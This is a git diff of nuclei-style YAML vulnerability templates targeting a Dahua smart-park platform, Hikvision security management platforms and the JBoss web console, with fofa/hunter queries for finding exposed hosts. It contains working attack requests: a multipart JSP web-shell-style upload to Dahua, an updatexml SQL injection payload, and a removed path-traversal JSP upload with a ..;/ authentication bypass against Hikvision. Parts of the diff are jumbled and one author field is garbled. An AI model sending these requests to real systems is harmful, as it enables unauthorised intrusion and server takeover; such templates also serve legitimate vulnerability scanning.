app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" +http: + - raw: + - | + POST /publishing/publishing/material/file/video HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + Content-Length: 804 + Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 + Accept-Encoding: gzip, deflate + Connection: close + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" -http: - - method: GET - path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + Test + --dd8f988919484abab3816881c55272a7 + Content-Disposition: form-data; name="Submit" - matchers-condition: and + submit + --dd8f988919484abab3816881c55272a7-- + + req-condition: true matchers: - - type: word - part: body - words: - - "c4ca" + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "success")' + - 'contains(body_1, "path")' + condition: and - - type: status - status: - - 500 +# /publishingImg/VIDEO/230812152005170200.jsp diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml index e86e8491d1..cd961f6e81 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/web/jboss-web-console.yaml b/poc/web/jboss-web-console.yaml old mode 100755 new mode 100644 index 8333db7f7b..87264c77fe --- a/poc/web/jboss-web-console.yaml +++ b/poc/web/jboss-web-console.yaml @@ -1,30 +1,22 @@ id: jboss-web-console info: name: JBoss Management Console Server Information - author: - - l0ne1y - description: |- - JBoss管理控制台服务器信息泄露漏洞 - 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + author: dhiyaneshDK severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序: - https://jbossweb.jboss.org/ - 临时修复方案: - 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 - 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + reference: + - https://www.exploit-db.com/ghdb/5215 + tags: jboss,unauth requests: -- matchers: - - type: word - condition: and - words: - - Application Server - - Management Console - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/web-console/ServerInfo.jsp' - method: GET + - method: GET + path: + - "{{BaseURL}}/web-console/ServerInfo.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Application Server" + - "Management Console" + condition: and + - type: status + status: + - 200